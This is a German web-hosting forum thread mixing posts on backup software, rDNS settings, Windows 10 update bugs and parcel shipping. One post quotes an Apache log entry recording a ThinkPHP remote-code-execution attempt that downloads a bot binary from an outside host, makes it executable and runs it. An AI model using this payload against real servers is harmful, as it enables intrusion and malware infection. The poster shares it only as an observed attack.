Das längste Thema

  • Benutzt hier jemand restic als Backup-Software?


    Bzw. was bevorzugt ihr?
    Borg, rsync, rclone, eigene Skripts, ..

    Ich selbst bevorzuge Server-Client Backup Lösungen. Ein zentraler Backup Server, der sich um die Backups der Clients kümmert und über den auch die Restores angestoßen werden können. Dies macht auch das Monitoring einfacher. Ich vertrete die Ansicht, dass ein Client nie schreibenden Zugriff auf seine eigenen Backups haben sollte.


    Hatte früher auch mal eigene Scripts oder Tools wie Borg genutzt. Hat im Grunde eigentlich auch immer funktioniert. Aber der Restore Prozess hat mir nie wirklich gut gefallen. Und darauf kommt es ja letztlich an. Wie kann man möglichst einfach uns zuverlässig einen alten Stand zurückspielen.


    Ich nutze daher Bareos und bin damit auch sehr zufrieden. Habe hier ungefähr 10 Clients, die ich darüber sichere.

  • vmk er dachte in die Richtung: wenn Du einen sinnvollen rDNS Eintrag hast, dann hast Du einen DNS-Eintrag, welcher auf die IP selbst zeigt;

    und damit kommt dann eine E-mail adresse der Domain zum Tragen, und nicht die netcup-Mailadresse ...

    oder anders: hast Du die bei der Einrichtung des vServers eingerichteten (r)DNS-Einträge gelassen?

    Grüße / Greetings

    Walter H.


    RS 1000 SAS G8 xRAM; RS 500 SSD G8; S 1000 G7; VPS 200 G8 Akt.; Webhost. 1000 m. 75%

  • Interessant, was man im Apache Log so findet...


    Code
    1. access_cloud.log.3:77.69.193.138 - - [25/Apr/2019:21:31:50 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://love.thotiana.live/bins/x86.bot;cat%20x86.bot%20>%20fucklol;chmod%20777%20fucklol;./fucklol%20thinkphp HTTP/1.1" 301 1095 "-" "WOW"


    Sieht echt nicht gesund aus, aber ich bezweifel, dass das geklappt hat. ^^

    VPS 1000 G8 Plus | RS Rentier 2019 | VPS 200 G8 | WH 1000 SE


    Wer im Netz Anstand und Respekt verliert, der ist auch im realen Leben für nichts zu gebrauchen! ;)

  • timkoop Genau das hab ich auch seit dem 1809 Upgrade. Ich darf das Notebook (Asus Zenbook Flip 15) nicht länger einfach so laufen lassen, ohne manuell in den Always-On-Modus zu schalten, sonst hängt er sich garantiert auf, sobald irgendwas in den Stromsparmodus wechseln will (keine Ahnung, was).


    Treiber hab ich schon alle aktualisiert, hat nichts gebracht. Ereignisanzeige hat nichts registriert vor dem manuellen Hard Reset. Vor 1809 trat das Problem nie auf.


    Standby durch Zuklappen (oder Powerbutton) ist kein Problem.

    Treiber habe ich auch aktualisiert... Beim zuklappen hängt er sich genau so auf... Das komische ist nur, dass das ganze Problem manchmal nicht auftritt (nach Klappe öffnen und wieder schließen hängt er sich jedoch auf)... Ich habe keine Ahnung, wovon das abhängt

  • vmk er dachte in die Richtung: wenn Du einen sinnvollen rDNS Eintrag hast, dann hast Du einen DNS-Eintrag, welcher auf die IP selbst zeigt;

    und damit kommt dann eine E-mail adresse der Domain zum Tragen, und nicht die netcup-Mailadresse ...

    oder anders: hast Du die bei der Einrichtung des vServers eingerichteten (r)DNS-Einträge gelassen?

    Ich wiederhole mich nur ungern, aber wie schon mehrfach geschrieben:

    1. Bei meinen IP-Adressen hat alles sauber funktioniert. Keine weitern Fragen.

    2. Fremde IP-Adressen und Subnetze - Welche Konstellation muss hier vorliegen, dass diese von selbst in meinen Account einsehbar sind?

    LinkeIn und XING - Schreibt mir einfach eine PN.


    "Security is like an onion - the more you dig in the more you want to cry"

  • Ein VPS 16 Years holt sich per rsnapshot stündlich die Daten von allen Servern. Ein Eierpower 2 (oder wie hieß der noch gleich?) ist jetzt dazugekommen, damit ich mir mal borg ansehen kann.

    ChestSort: Automatische Kistensortierung in Minecraft - www.chestsort.de


    www.jeff24.de | RS2000 Plus, VPS2000 Plus, 2xVPS500, 2xVPS200, EiWoMiSau

  • Ich frage mich echt, woran Amazon es festmacht, dass Dinge als Brief versandt werden. Andererseits möchte ich sehen, wie der 30mm Starke Alublock des Magnetventils es in meinen Briefkasten schafft.

    (Spoiler: Nein, der Schlitz zum Einwerfen ist nicht breit genug.)

  • Wann verlässt Windows 10 eigentlich den Beta Status?

    1809 installiert und der Ton funktioniert in allen Ubisoft Titeln nicht mehr...


    Nach jedem Update (wohlgemerkt über das ISO und nicht über Windows Update. Das funktioniert nämlich nie), denkst du dir: was geht denn heute kaputt.